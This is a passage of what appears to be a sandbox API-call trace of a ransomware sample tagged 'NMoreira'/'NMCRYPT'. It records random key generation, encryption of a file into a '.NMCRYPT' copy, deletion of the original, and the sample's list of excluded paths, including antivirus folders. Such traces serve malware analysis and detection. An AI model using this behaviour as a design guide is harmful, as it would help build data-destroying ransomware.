pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.365] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.366] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.367] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.367] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.367] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0155.367] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.367] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad4b8) returned 1 [0155.367] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.367] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.368] wcslen (_String="\\\\?\\") returned 0x4 [0155.368] CryptDuplicateKey (in: hKey=0x9ad4b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2f8) returned 1 [0155.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.368] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=221) returned 1 [0155.368] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.369] ReadFile (in: hFile=0x1624, lpBuffer=0x28d51e0, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d51e0*, lpNumberOfBytesRead=0x2d7e160*=0xdd, lpOverlapped=0x0) returned 1 [0155.370] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xdd, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.370] GetLastError () returned 0x0 [0155.370] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.382] ReadFile (in: hFile=0x1624, lpBuffer=0x28d51e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d51e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.382] WriteFile (in: hFile=0x588, lpBuffer=0x28d51e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d51e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml")) returned 0x20 [0155.382] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml", dwFileAttributes=0x20) returned 0 [0155.383] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 1 [0155.383] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml")) returned 0 [0155.383] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" [0155.383] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.383] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD21B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd21b.tmp")) returned 0xd21b [0155.384] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD21B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd21b.tmp"), dwFlags=0x1) returned 0 [0155.384] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD21B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd21b.tmp")) returned 1 [0155.384] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0155.384] wcslen (_String="OK") returned 0x2 [0155.384] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.384] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.384] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0155.384] CryptDestroyHash (hHash=0x9ad678) returned 1 [0155.384] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0155.384] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.385] wcscmp (_String1="oskmenu", _String2=".") returned 1 [0155.385] wcscmp (_String1="oskmenu", _String2="..") returned 1 [0155.385] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*NMCRYPT") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*Recovers your files.html") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.exe") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.dll") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.lnk") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.bat") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.ini") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.msi") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*.scf") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*pagefile.sys*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*AppData*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\winrar\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\java\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\windows\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\ESET\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\AVG\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*Atheros*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*Realtek*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*bootmgr*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*boot*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*boot*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*IO.SYS*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*ntldr*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*chrome*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*opera*") returned 0 [0155.385] PathMatchSpecW (pszFile="oskmenu.xml", pszSpec="*firefox*") returned 0 [0155.385] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml", pszSpec="*") returned 1 [0155.385] strlen (_Str="NMoreira") returned 0x8 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.386] CryptGenRandom (in: hProv=0x8bf310, 